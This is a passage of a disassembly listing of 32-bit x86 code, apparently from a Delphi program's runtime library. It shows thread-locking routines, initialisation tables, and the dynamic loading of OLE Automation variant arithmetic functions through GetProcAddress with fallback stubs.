call sub_4000C5D0
dec dword ptr [ebx+1Ch]
cmp dword ptr [ebx+1Ch], 0
jnz short loc_4000C87F
xor eax, eax
mov [ebx+24h], eax
lea eax, [ebx+0Ch]
mov edx, 0FFFFh
call sub_4000C554
mov eax, ebx
call sub_4000C770
mov eax, ebx
call sub_4000C764
loc_4000C87F: ; CODE XREF: .text:4000C85D�j
mov eax, [esp]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4000C892
mov edx, esp
mov eax, [ebx+20h]
call sub_4000C648
loc_4000C892: ; CODE XREF: .text:4000C886�j
pop edx
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
push ebx
push esi
push edi
push ecx
mov edi, eax
mov edx, esp
mov eax, [edi+20h]
call sub_4000C5D0
mov eax, [esp]
inc dword ptr [eax+0Ch]
mov eax, [esp]
cmp dword ptr [eax+0Ch], 1
setnbe bl
call sub_40006560 ; GetCurrentThreadId
cmp eax, [edi+24h]
jz short loc_4000C902
test bl, bl
jnz short loc_4000C902
mov eax, edi
call sub_4000C77C
jmp short loc_4000C8F6
; ---------------------------------------------------------------------------
loc_4000C8CF: ; CODE XREF: .text:4000C900�j
lea eax, [edi+0Ch]
call sub_4000C534
mov esi, eax
cmp esi, 0FFFFh
jnz short loc_4000C8E8
mov eax, edi
call sub_4000C770
loc_4000C8E8: ; CODE XREF: .text:4000C8DF�j
push 0
call sub_4000C408 ; Sleep
mov eax, edi
call sub_4000C77C
loc_4000C8F6: ; CODE XREF: .text:4000C8CD�j
lea eax, [edi+0Ch]
call sub_4000C540
test eax, eax
jle short loc_4000C8CF
loc_4000C902: ; CODE XREF: .text:4000C8C0�j
; .text:4000C8C4�j
pop edx
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
push ebx
push ecx
mov ebx, eax
mov edx, esp
mov eax, [ebx+20h]
call sub_4000C5D0
mov eax, [esp]
dec dword ptr [eax+0Ch]
mov eax, [esp]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4000C96D
mov edx, esp
mov eax, [ebx+20h]
call sub_4000C648
call sub_40006560 ; GetCurrentThreadId
cmp eax, [ebx+24h]
jz short loc_4000C96D
lea eax, [ebx+0Ch]
call sub_4000C534
mov ecx, eax
cmp ecx, 0FFFFh
jnz short loc_4000C954
mov eax, ebx
call sub_4000C770
jmp short loc_4000C96D
; ---------------------------------------------------------------------------
loc_4000C954: ; CODE XREF: .text:4000C949�j
test ecx, ecx
jg short loc_4000C96D
mov eax, ecx
mov ecx, 0FFFFh
cdq
idiv ecx
test edx, edx
jnz short loc_4000C96D
mov eax, ebx
call sub_4000C770
loc_4000C96D: ; CODE XREF: .text:4000C923�j
; .text:4000C937�j ...
pop edx
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_4000C970 proc near ; CODE XREF: sub_4000CC50+22�p
; sub_40013ED4+40�p ...
mov edx, [eax]
xor ecx, ecx
mov [eax], ecx
mov eax, edx
call sub_40003CE8
retn
sub_4000C970 endp
; ---------------------------------------------------------------------------
align 10h
dword_4000C980 dd 1Dh dd offset dword_4001AA00
dd offset off_4001B010
dd offset dword_4001A9F8
dd offset off_4001AFA4
dd offset dword_4001A9F0
dd offset off_4001AEE0
dd offset dword_4001A9E8
dd offset off_4001B038
dd offset dword_4001A9E0
dd offset off_4001B050
dd offset dword_4001A9D8
dd offset off_4001AF44
dd offset dword_4001A9D0
dd offset off_4001AF94
dd offset dword_4001A9C8
dd offset off_4001AEBC
dd offset dword_4001A9C0
dd offset off_4001AFB4
dd offset dword_4001A9B8
dd offset off_4001AFD4
dd offset dword_4001A9B0
dd offset off_4001AF70
dd offset dword_4001A9A8
dd offset off_4001AF78
dd offset dword_4001A9A0
dd offset off_4001B088
dd offset dword_4001A998
dd offset off_4001AF74
dd offset dword_4001A990
dd offset off_4001B0BC
dd offset dword_4001A988
dd offset off_4001B004
dd offset dword_4001A980
dd offset off_4001AFEC
dd offset dword_4001A978
dd offset off_4001B0C4
dd offset dword_4001A970
dd offset off_4001B0A8
dd offset dword_4001A968
dd offset off_4001AF88
dd offset dword_4001A960
dd offset off_4001B08C
dd offset dword_4001A958
dd offset off_4001B094
dd offset dword_4001A950
dd offset off_4001AF34
dd offset dword_4001A948
dd offset off_4001AF0C
dd offset dword_4001A940
dd offset off_4001AFE8
dd offset dword_4001A938
dd offset off_4001B034
dd offset dword_4001A930
dd offset off_4001AEC4
dd offset dword_4001A928
dd offset off_4001B084
dd offset dword_4001A920
dd offset off_4001AF84
dword_4000CA6C dd 28h dd offset off_4001A918
dd offset off_4001B078
dd 0
dd offset off_4001A914
dd offset off_4001AEE8
align 8
dd offset off_4001A910
dd offset off_4001B028
dd 0
dd offset off_4001A90C
dd offset off_4001AED0
align 10h
dd offset off_4001A908
dd offset off_4001AF18
dd 0
dd offset off_4001A904
dd offset off_4001AF10
dd 0
dd offset off_4001A900
dd offset off_4001AEF0
dd 0
dd offset off_4001A8FC
dd offset off_4001AF80
align 10h
dd offset off_4001A8F8
dd offset off_4001B000
dd 0
dd offset off_4001A8F4
dd offset off_4001AF14
align 8
dd offset off_4001A8F0
dd offset off_4001AFE0
dd 0
dd offset off_4001A8EC
dd offset off_4001B04C
align 10h
dd offset off_4001A8E8
dd offset off_4001B040
dd 0
dd offset off_4001A8E4
dd offset off_4001B008
align 8
dd offset off_4001A8E0
dd offset off_4001AF6C
dd 0
dd offset off_4001A8DC
dd offset off_4001AF50
align 10h
dd offset off_4001A8D8
dd offset off_4001AECC
dd 0
dd offset off_4001A8D4
dd offset off_4001B03C
align 8
dd offset off_4001A8D0
dd offset off_4001AFC4
dd 0
dd offset off_4001A8CC
dd offset off_4001AF48
align 10h
dd offset off_4001A8C8
dd offset off_4001AFB0
dd 0
dd offset off_4001A8C4
dd offset off_4001AFF8
align 8
dd offset off_4001A8C0
dd offset off_4001AFBC
dd 0
dd offset off_4001A8BC
dd offset off_4001AF58
align 10h
dd offset off_4001A8B8
dd offset off_4001AEC8
dd 0
dd offset off_4001A8B4
dd offset off_4001AF9C
align 8
dd offset off_4001A8B0
dd offset off_4001B098
dd 0
dd offset off_4001A8AC
dd offset off_4001B070
align 10h
dd offset off_4001A8A8
dd offset off_4001AFDC
dd 0
dd offset off_4001A8A4
dd offset off_4001AF30
align 8
dd offset off_4001A8A0
dd offset off_4001AED8
dd 0
dd offset off_4001A89C
dd offset off_4001B068
align 10h
dd offset off_4001A898
dd offset off_4001B0D0
dd 0
dd offset off_4001A894
dd offset off_4001AEF4
dd 0
dd offset off_4001A890
dd offset off_4001AEB8
dd 0
dd offset off_4001A88C
dd offset off_4001B080
align 10h
dd offset off_4001A888
dd offset off_4001AFD8
dd 0
dd offset off_4001A884
dd offset off_4001B0AC
align 8
dd offset off_4001A860
dd offset off_4001AF8C
dd 0
dd offset off_4001A85C
dd offset off_4001AF38
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CC50 proc near ; DATA XREF: .text:40018370�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4000CDCF
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001E918
jnz loc_4000CDC1
mov eax, offset dword_4001F224
call sub_4000C970
mov eax, offset sub_4000C230
call sub_400060C4
call sub_4000C4B4
call sub_4000B7B0
mov eax, offset dword_4001A7DC
call sub_40004884
mov eax, offset dword_4001A7E0
call sub_40005008
mov eax, offset dword_4001A7F4
call sub_40004884
mov eax, offset dword_4001E808
call sub_40004884
mov eax, offset dword_4001E814
call sub_40004884
mov eax, offset dword_4001E818
call sub_40004884
mov eax, offset dword_4001E820
call sub_40004884
mov eax, offset dword_4001E824
call sub_40004884
mov eax, offset dword_4001E828
call sub_40004884
mov eax, offset dword_4001E82C
call sub_40004884
mov eax, offset dword_4001E830
mov ecx, 0Ch
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001E860
mov ecx, 0Ch
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001E890
mov ecx, 7
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001E8AC
mov ecx, 7
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001E8D8
mov ecx, 7
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001E910
mov edx, ds:off_400077D8
call sub_40005B34
mov eax, offset dword_4001E914
mov edx, ds:off_400077FC
call sub_40005B34
mov eax, offset off_4001A84C
call sub_40004884
mov eax, offset off_4001A854
mov ecx, 2
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001A91C
mov ecx, 7
mov edx, ds:off_4000B210
call sub_40005314
mov eax, offset off_4001A954
mov ecx, 16h
mov edx, ds:off_4000B290
call sub_40005314
loc_4000CDC1: ; CODE XREF: sub_4000CC50+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000CDD6
loc_4000CDCE: ; CODE XREF: sub_4000CC50+184�j
retn
; ---------------------------------------------------------------------------
loc_4000CDCF: ; DATA XREF: sub_4000CC50+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000CDCE
; ---------------------------------------------------------------------------
loc_4000CDD6: ; CODE XREF: sub_4000CC50:loc_4000CDCE�j
; DATA XREF: sub_4000CC50+179�o
pop ebp
retn
sub_4000CC50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000CDD8 proc near ; CODE XREF: sub_4000E35C+72�p
; sub_4000E744+13�p ...
jmp ds:dword_40024660
sub_4000CDD8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000CDE0 proc near ; CODE XREF: sub_4000E1E0+16B�p
; sub_4000E35C+F�p ...
jmp ds:dword_4002465C
sub_4000CDE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000CDE8 proc near ; CODE XREF: sub_4000E480+1B9�p
; sub_4000E654+21�p ...
jmp ds:dword_40024658
sub_4000CDE8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000CDF0 proc near ; CODE XREF: sub_4000CDF8+25�p
jmp ds:dword_40024654
sub_4000CDF0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CDF8 proc near ; DATA XREF: sub_4000D28C+12�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = word ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 400h
jz short loc_4000CE0B
mov eax, 80004001h
jmp short loc_4000CE22
; ---------------------------------------------------------------------------
loc_4000CE0B: ; CODE XREF: sub_4000CDF8+A�j
movzx eax, [ebp+arg_10]
push eax
movzx eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call sub_4000CDF0
loc_4000CE22: ; CODE XREF: sub_4000CDF8+11�j
pop ebp
retn 14h
sub_4000CDF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CE28 proc near ; DATA XREF: sub_4000D28C+28�o
; sub_4000D28C+3E�o
push ebp
mov ebp, esp
mov eax, 80004001h
pop ebp
retn 8
sub_4000CE28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CE34 proc near ; DATA XREF: sub_4000D28C+54�o
; sub_4000D28C+6A�o ...
push ebp
mov ebp, esp
mov eax, 80004001h
pop ebp
retn 0Ch
sub_4000CE34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CE40 proc near ; DATA XREF: sub_4000D28C+11A�o
push ebp
mov ebp, esp
mov eax, 80004001h
pop ebp
retn 10h
sub_4000CE40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CE4C proc near ; DATA XREF: sub_4000D28C+130�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
xor eax, eax
push ebp
push offset loc_4000CEA6
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000CE70
mov ebx, 80004001h
jmp short loc_4000CE90
; ---------------------------------------------------------------------------
loc_4000CE70: ; CODE XREF: sub_4000CE4C+1B�j
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_4]
mov edx, [ebp+arg_C]
call sub_40007DEC
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
loc_4000CE90: ; CODE XREF: sub_4000CE4C+22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000CEAD
loc_4000CE9D: ; CODE XREF: sub_4000CE4C+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000CEA6: ; DATA XREF: sub_4000CE4C+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000CE9D
; ---------------------------------------------------------------------------
loc_4000CEAD: ; CODE XREF: sub_4000CE4C+59�j
; DATA XREF: sub_4000CE4C+4C�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000CE4C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CEB8 proc near ; DATA XREF: sub_4000D28C+146�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
xor eax, eax
push ebp
push offset loc_4000CF12
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000CEDC
mov ebx, 80004001h
jmp short loc_4000CEFC
; ---------------------------------------------------------------------------
loc_4000CEDC: ; CODE XREF: sub_4000CEB8+1B�j
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_4]
mov edx, [ebp+arg_C]
call sub_40008EBC
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
loc_4000CEFC: ; CODE XREF: sub_4000CEB8+22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000CF19
loc_4000CF09: ; CODE XREF: sub_4000CEB8+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000CF12: ; DATA XREF: sub_4000CEB8+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000CF09
; ---------------------------------------------------------------------------
loc_4000CF19: ; CODE XREF: sub_4000CEB8+59�j
; DATA XREF: sub_4000CEB8+4C�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000CEB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CF24 proc near ; DATA XREF: sub_4000D28C+15C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
xor eax, eax
push ebp
push offset loc_4000CF7E
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000CF48
mov ebx, 80004001h
jmp short loc_4000CF68
; ---------------------------------------------------------------------------
loc_4000CF48: ; CODE XREF: sub_4000CF24+1B�j
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_4]
mov edx, [ebp+arg_C]
call sub_40008E90
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
loc_4000CF68: ; CODE XREF: sub_4000CF24+22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000CF85
loc_4000CF75: ; CODE XREF: sub_4000CF24+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000CF7E: ; DATA XREF: sub_4000CF24+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000CF75
; ---------------------------------------------------------------------------
loc_4000CF85: ; CODE XREF: sub_4000CF24+59�j
; DATA XREF: sub_4000CF24+4C�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000CF24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CF90 proc near ; DATA XREF: sub_4000D28C+172�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
xor eax, eax
push ebp
push offset loc_4000CFEA
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000CFB4
mov ebx, 80004001h
jmp short loc_4000CFD4
; ---------------------------------------------------------------------------
loc_4000CFB4: ; CODE XREF: sub_4000CF90+1B�j
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_4]
mov edx, [ebp+arg_C]
call sub_4000A780
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
loc_4000CFD4: ; CODE XREF: sub_4000CF90+22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000CFF1
loc_4000CFE1: ; CODE XREF: sub_4000CF90+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000CFEA: ; DATA XREF: sub_4000CF90+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000CFE1
; ---------------------------------------------------------------------------
loc_4000CFF1: ; CODE XREF: sub_4000CF90+59�j
; DATA XREF: sub_4000CF90+4C�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000CF90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000CFFC proc near ; DATA XREF: sub_4000D28C+188�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
xor eax, eax
push ebp
push offset loc_4000D056
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000D020
mov ebx, 80004001h
jmp short loc_4000D040
; ---------------------------------------------------------------------------
loc_4000D020: ; CODE XREF: sub_4000CFFC+1B�j
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_4]
mov edx, [ebp+arg_C]
call sub_40008EE8
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
loc_4000D040: ; CODE XREF: sub_4000CFFC+22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D05D
loc_4000D04D: ; CODE XREF: sub_4000CFFC+5F�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000D056: ; DATA XREF: sub_4000CFFC+9�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D04D
; ---------------------------------------------------------------------------
loc_4000D05D: ; CODE XREF: sub_4000CFFC+59�j
; DATA XREF: sub_4000CFFC+4C�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000CFFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D068 proc near ; DATA XREF: sub_4000D28C+19E�o
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
xor eax, eax
mov [ebp+var_8], eax
xor eax, eax
push ebp
push offset loc_4000D0D5
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000D092
mov ebx, 80004001h
jmp short loc_4000D0BF
; ---------------------------------------------------------------------------
loc_4000D092: ; CODE XREF: sub_4000D068+21�j
lea eax, [ebp+var_8]
mov edx, [ebp+arg_0]
call sub_40004B0C
mov eax, [ebp+var_8]
lea edx, [ebp+var_1]
call sub_40007F40
and eax, 7Fh
mov ebx, dword_4001AA08[eax*4]
cmp [ebp+var_1], 1
cmc
sbb eax, eax
mov edx, [ebp+arg_C]
mov [edx], ax
loc_4000D0BF: ; CODE XREF: sub_4000D068+28�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D0DC
loc_4000D0CC: ; CODE XREF: sub_4000D068+72�j
lea eax, [ebp+var_8]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000D0D5: ; DATA XREF: sub_4000D068+F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D0CC
; ---------------------------------------------------------------------------
loc_4000D0DC: ; CODE XREF: sub_4000D068+6C�j
; DATA XREF: sub_4000D068+5F�o
mov eax, ebx
pop ebx
pop ecx
pop ecx
pop ebp
retn 10h
sub_4000D068 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D0E8 proc near ; DATA XREF: sub_4000D28C+1B4�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push ebx
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4000D0F9
xor edx, edx
mov [eax], edx
loc_4000D0F9: ; CODE XREF: sub_4000D0E8+B�j
xor eax, eax
push ebp
push offset loc_4000D148
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_8], 400h
jz short loc_4000D117
mov ebx, 80004001h
jmp short loc_4000D132
; ---------------------------------------------------------------------------
loc_4000D117: ; CODE XREF: sub_4000D0E8+26�j
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_4]
call sub_40008E44
mov edx, [ebp+var_4]
mov eax, [ebp+arg_10]
call sub_40005158
xor ebx, ebx
loc_4000D132: ; CODE XREF: sub_4000D0E8+2D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D14F
loc_4000D13F: ; CODE XREF: sub_4000D0E8+65�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000D148: ; DATA XREF: sub_4000D0E8+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D13F
; ---------------------------------------------------------------------------
loc_4000D14F: ; CODE XREF: sub_4000D0E8+5F�j
; DATA XREF: sub_4000D0E8+52�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 14h
sub_4000D0E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D158 proc near ; DATA XREF: sub_4000D28C+1CA�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push ebx
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4000D169
xor edx, edx
mov [eax], edx
loc_4000D169: ; CODE XREF: sub_4000D158+B�j
xor eax, eax
push ebp
push offset loc_4000D1BA
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_8], 400h
jz short loc_4000D187
mov ebx, 80004001h
jmp short loc_4000D1A4
; ---------------------------------------------------------------------------
loc_4000D187: ; CODE XREF: sub_4000D158+26�j
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_4]
xor edx, edx
call sub_40009E60
mov eax, [ebp+arg_10]
mov edx, [ebp+var_4]
call sub_40005158
xor ebx, ebx
loc_4000D1A4: ; CODE XREF: sub_4000D158+2D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D1C1
loc_4000D1B1: ; CODE XREF: sub_4000D158+67�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000D1BA: ; DATA XREF: sub_4000D158+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D1B1
; ---------------------------------------------------------------------------
loc_4000D1C1: ; CODE XREF: sub_4000D158+61�j
; DATA XREF: sub_4000D158+54�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 14h
sub_4000D158 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D1CC proc near ; DATA XREF: sub_4000D28C+1E0�o
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
mov eax, [ebp+arg_C]
test eax, eax
jz short loc_4000D1DD
xor edx, edx
mov [eax], edx
loc_4000D1DD: ; CODE XREF: sub_4000D1CC+B�j
xor eax, eax
push ebp
push offset loc_4000D230
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp [ebp+arg_4], 400h
jz short loc_4000D1FB
mov ebx, 80004001h
jmp short loc_4000D21A
; ---------------------------------------------------------------------------
loc_4000D1FB: ; CODE XREF: sub_4000D1CC+26�j
cmp [ebp+arg_0], 1
sbb eax, eax
inc eax
lea ecx, [ebp+var_4]
xor edx, edx
call sub_40007FDC
mov edx, [ebp+var_4]
mov eax, [ebp+arg_C]
call sub_40005158
xor ebx, ebx
loc_4000D21A: ; CODE XREF: sub_4000D1CC+2D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000D237
loc_4000D227: ; CODE XREF: sub_4000D1CC+69�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000D230: ; DATA XREF: sub_4000D1CC+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000D227
; ---------------------------------------------------------------------------
loc_4000D237: ; CODE XREF: sub_4000D1CC+63�j
; DATA XREF: sub_4000D1CC+56�o
mov eax, ebx
pop ebx
pop ecx
pop ebp
retn 10h
sub_4000D1CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000D240 proc near ; CODE XREF: sub_4000E480+EE�p
jmp ds:dword_40024650
sub_4000D240 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000D248 proc near ; CODE XREF: sub_4000E1E0+AF�p
; sub_4000E480+99�p
jmp ds:dword_4002464C
sub_4000D248 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000D250 proc near ; CODE XREF: sub_4000E1E0+CB�p
; sub_4000E480+B5�p
jmp ds:dword_40024648
sub_4000D250 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000D258 proc near ; CODE XREF: sub_4000E1E0+142�p
; sub_4000E480+16B�p ...
jmp ds:dword_40024644
sub_4000D258 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D260 proc near ; CODE XREF: sub_4000D28C+1C�p
; sub_4000D28C+32�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, edx
mov edx, ebx
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx-4], 0
jz short loc_4000D286
push eax
mov eax, [ebp+arg_0]
mov eax, [eax-4]
push eax
call sub_400065A8 ; GetProcAddress
mov edx, eax
test edx, edx
jnz short loc_4000D286
mov edx, ebx
loc_4000D286: ; CODE XREF: sub_4000D260+F�j
; sub_4000D260+22�j
mov eax, edx
pop ebx
pop ebp
retn
sub_4000D260 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000D28C proc near ; CODE XREF: .itext:4001913D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_4000D484
call sub_400065A0 ; GetModuleHandleA
mov [ebp+var_4], eax
push ebp
mov edx, offset sub_4000CDF8
mov eax, offset aVariantchanget ; "VariantChangeTypeEx"
call sub_4000D260
pop ecx
mov ds:dword_4001F228, eax
push ebp
mov edx, offset sub_4000CE28
mov eax, offset aVarneg ; "VarNeg"
call sub_4000D260
pop ecx
mov ds:dword_4001F22C, eax
push ebp
mov edx, offset sub_4000CE28
mov eax, offset aVarnot ; "VarNot"
call sub_4000D260
pop ecx
mov ds:dword_4001F230, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVaradd ; "VarAdd"
call sub_4000D260
pop ecx
mov ds:dword_4001F234, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVarsub ; "VarSub"
call sub_4000D260
pop ecx
mov ds:dword_4001F238, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVarmul ; "VarMul"
call sub_4000D260
pop ecx
mov ds:dword_4001F23C, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVardiv ; "VarDiv"
call sub_4000D260
pop ecx
mov ds:dword_4001F240, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVaridiv ; "VarIdiv"
call sub_4000D260
pop ecx
mov ds:dword_4001F244, eax
push ebp
mov edx, offset sub_4000CE34
mov eax, offset aVarmod ; "VarMod"
call sub_4000D260
pop ecx
mov ds:dword_4001F248, eax
push ebp
